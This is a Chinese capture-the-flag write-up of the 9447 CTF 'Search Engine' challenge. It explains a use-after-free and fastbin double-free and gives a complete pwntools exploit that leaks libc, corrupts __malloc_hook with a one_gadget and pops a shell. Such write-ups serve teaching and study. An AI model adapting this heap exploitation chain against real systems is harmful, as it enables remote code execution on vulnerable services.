fastbin double free

1.实例1 2015 9447 CTF : Search Engine
题目逻辑比较复杂,需要耐心仔细的分析.
还是那几样: 全局变量. 这里全局变量是一个链表头指针
数据结构及其存储分布分析:单链表结构,每个结构有2个指针指向字符串堆.
程序释放内存后会把内存置 0,并通过堆内容是否为 0 来判断句子是否已经释放。然而内存释放后可能被放入 unsorted bin、small
bin 或 fastbin:前两种都会在 chunk 头部写入 fd/bk 指针,使内容不再为 0,从而绕过这一检查,造成 UAF 或 double free;这里利用的是 double free。
fastbin 中第一个被释放的 chunk 其 fd 为 NULL,检查仍然成立;但从第二个开始,fd 指向链上的下一个 chunk,同样不为 0,因此可以再次释放,形成 double free。
利用总结:
fastbin 循环链表 f->b->a->b 形成后:先申请得到 b,并在其 fd 处写入 &main_arena - 0x33(链表变为 f->a->b->fake);
再申请 a(f->b->fake),再申请 b(f->fake);下一次申请即返回位于 &main_arena - 0x33 的 fake chunk,其用户指针为 &main_arena - 0x23。
把 __malloc_hook 改写为 one_gadget 地址,再次申请内存即可触发 hook 拿到 shell。
泄漏 unsorted bin 的地址(它位于 main_arena 内部,偏移固定)即可算出 main_arena 地址,再减去与具体 libc 版本相关的固定偏移即得 libc 基址。

 gef➤  x/x &__malloc_hook
0x7fce71fbbb10 <__malloc_hook>: 0x0000000000000000
gef➤  x/x &main_arena
0x7fce71fbbb20 :    0x0000000000000000
在此 libc 中 __malloc_hook 和 main_arena 相差 0x10 字节(见上面的 gdb 输出)

exp:

from pwn import *
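context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
if args['DEBUG']:
    context.log_level = 'debug'
context.binary = "./search"
search = context.binary

# Offset of main_arena from the libc base.  It is fixed for a given libc
# build only (check it with `x/x &main_arena` in gdb against the leaked libc
# base) and must be re-derived when the remote libc differs from the local
# one.  It lives at module level on purpose: exp() needs it on both the
# local and the REMOTE path, so it must not be defined only inside `else`.
main_arena_offset = 0x3c4b20

if args['REMOTE']:
    p = remote('127.0.0.1', 7777)
else:
    p = process("./search")

# pidof() on a remote tube may find nothing (or several listeners); only log
# when there is a pid instead of indexing an empty list.
_pids = proc.pidof(p)
if _pids:
    log.info('PID: ' + str(_pids[0]))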


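def offset_bin_main_arena(idx, word_size=None):
    """Return the byte offset of bin ``idx`` (0 = unsorted bin) from ``main_arena``.

    Models the ``struct malloc_state`` layout this exploit targets: ``mutex``
    (4 bytes), ``flags`` (4 bytes), ten fastbin heads, ``top``,
    ``last_remainder`` and then ``bins[]``.  A bin "chunk" is addressed two
    words *before* ``bins[idx * 2]`` so that a chunk header's ``fd``/``bk``
    overlap the bin's two pointers, hence the final subtraction.

    NOTE(review): this matches the 2.23-era glibc implied by
    ``main_arena_offset``; newer glibc (2.27+) adds ``have_fastchunks``
    after ``flags`` and shifts the fastbins, so re-check against
    ``x/x &main_arena`` before reusing it on another libc.

    Args:
        idx: 0-based bin index; 0 is the unsorted bin, 1 the first small bin.
        word_size: machine word size in bits (32 or 64).  Defaults to
            ``context.word_size`` from pwntools so existing callers are
            unchanged; passing it explicitly makes the helper usable
            without a configured pwntools context.

    Returns:
        The offset as an ``int``.  Integer division is used throughout:
        ``/`` yields a float under Python 3 and would poison every
        subsequent pointer computation.
    """
    if word_size is None:
        word_size = context.word_size
    word_bytes = word_size // 8
    offset = 4 + 4                      # mutex, flags
    offset += word_bytes * 10           # fastbinsY[NFASTBINS == 10]
    offset += word_bytes * 2            # top, last_remainder
    offset += idx * 2 * word_bytes      # bins[idx * 2]
    offset -= word_bytes * 2            # bin_at() header-overlap trick
    return offset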

# The unsorted bin head lives at a fixed offset inside main_arena (0x58 on
# 64-bit with the layout modelled above), so leaking its address yields
# main_arena and, via main_arena_offset, the libc base.
unsortedbin_offset_main_arena = offset_bin_main_arena(0)


def index_sentence(s):
    """Menu option 2: index the sentence ``s``.

    The length is sent first, then the raw bytes with send() rather than
    sendline() -- the service presumably reads exactly ``len(s)`` bytes, so
    a trailing newline would end up in the next prompt.
    """
    dialogue = (
        ("3: Quit\n", '2'),
        ("Enter the sentence size:\n", str(len(s))),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.send(s)


def search_word(word):
    """Menu option 1: search for ``word``.

    Mirrors index_sentence(): length first, then the raw bytes via send()
    so no newline is appended to the word itself.
    """
    dialogue = (
        ("3: Quit\n", '1'),
        ("Enter the word size:\n", str(len(word))),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.send(word)


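def leak_libc():
    """Leak the address of the unsorted-bin head inside ``main_arena``.

    Indexes a 0x88-byte sentence (large enough to bypass the fastbins),
    deletes it so it lands in the unsorted bin, then searches for a single
    NUL byte.  The program zeroes a freed sentence but still walks it (the
    UAF described in the write-up), and free() has meanwhile written the
    bin's ``fd`` pointer over the first 8 bytes, so the ``Found N: `` output
    echoes that pointer back.

    Returns:
        The leaked ``fd`` value, i.e.
        ``&main_arena + unsortedbin_offset_main_arena``.
    """
    smallbin_sentence = 's' * 0x85 + ' m '
    index_sentence(smallbin_sentence)
    search_word('m')
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('y')
    search_word('\x00')
    p.recvuntil('Found ' + str(len(smallbin_sentence)) + ': ')
    # recvn() blocks until exactly 8 bytes have arrived; recv(8) may return a
    # short read (e.g. over a slow REMOTE link) and u64() would then raise.
    unsortedbin_addr = u64(p.recvn(8))
    p.recvuntil('Delete this sentence (y/n)?\n')
    p.sendline('n')
    return unsortedbin_addr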


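def _delete_matches(answers):
    """Answer the "Delete this sentence (y/n)?" prompt once per character of ``answers``."""
    for answer in answers:
        p.recvuntil('Delete this sentence (y/n)?\n')
        p.sendline(answer)


def _build_fastbin_cycle():
    """Turn three 0x60-byte sentences into a fastbin (0x70 chunk) cycle b -> a -> b.

    After the three deletes the bin is a -> b -> c.  Searching for a NUL byte
    then finds the zeroed, already-freed sentences again (UAF); answering 'y'
    to the first hit frees b a second time, which passes glibc's fastbin
    double-free check because that check only compares against the current
    bin head (a).  The resulting list is b -> a -> b -> a -> ...
    """
    for tag in 'abc':
        index_sentence(tag * 0x5d + ' d ')
    search_word('d')
    _delete_matches('yyy')          # a -> b -> c -> NULL
    search_word('\x00')
    _delete_matches('ynn')          # b -> a -> b -> a -> ...


def _overwrite_malloc_hook(main_arena_addr, libc_base):
    """Point the 0x70 fastbin at a fake chunk below ``__malloc_hook`` and write a one_gadget over the hook.

    The fake chunk is placed at ``&main_arena - 0x33``.  Its user pointer is
    therefore ``&main_arena - 0x23`` while ``__malloc_hook`` sits at
    ``&main_arena - 0x10`` (see the gdb output above), so 0x13 bytes of
    padding land the gadget exactly on the hook.

    NOTE(review): the reason this particular address works is the usual
    __malloc_hook trick -- the qword read as the fake size field starts with
    a 0x7f byte from a neighbouring libc pointer, which malloc accepts for
    the 0x70 bin.  Confirm with ``x/2gx &main_arena-0x33`` before porting.
    """
    fake_chunk_addr = main_arena_addr - 0x33
    # Re-allocating b lets us overwrite its fd: bin becomes a -> b -> fake.
    index_sentence(p64(fake_chunk_addr).ljust(0x60, 'f'))
    index_sentence('a' * 0x60)          # takes a:      b -> fake
    index_sentence('b' * 0x60)          # takes b:      fake
    # NOTE(review): one_gadget offset is specific to the libc build implied by
    # main_arena_offset; recompute it (one_gadget tool) for any other libc.
    one_gadget_addr = libc_base + 0xf02a4
    payload = ('a' * 0x13 + p64(one_gadget_addr)).ljust(0x60, 'f')
    # This allocation returns the fake chunk; the write clobbers
    # __malloc_hook, and the program's next malloc() runs the gadget.
    index_sentence(payload)


def exp():
    """Run the full chain: leak libc, build the fastbin cycle, hijack __malloc_hook, drop to a shell."""
    # 1. leak libc base
    unsortedbin_addr = leak_libc()
    main_arena_addr = unsortedbin_addr - unsortedbin_offset_main_arena
    libc_base = main_arena_addr - main_arena_offset
    log.success('unsortedbin addr: ' + hex(unsortedbin_addr))
    log.success('libc base addr: ' + hex(libc_base))
    # A libc base that is not page aligned means the leak or the offsets are
    # wrong (different libc build); stop here instead of corrupting the hook.
    if libc_base & 0xfff:
        log.error('libc base %#x is not page aligned; check main_arena_offset'
                  % libc_base)
    # Attaching gdb unconditionally stalls headless runs and is meaningless
    # for a REMOTE target, so gate it on the DEBUG flag (`python exp.py DEBUG`).
    if args['DEBUG']:
        gdb.attach(p)
    # 2. create cycle fastbin 0x70 size
    _build_fastbin_cycle()
    # 3. fastbin attack to malloc_hook nearby chunk
    _overwrite_malloc_hook(main_arena_addr, libc_base)
    p.interactive()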


# Script entry point; pwntools parses `DEBUG` / `REMOTE` flags from argv,
# e.g. `python exp.py REMOTE`.
if __name__ == "__main__":
    exp()
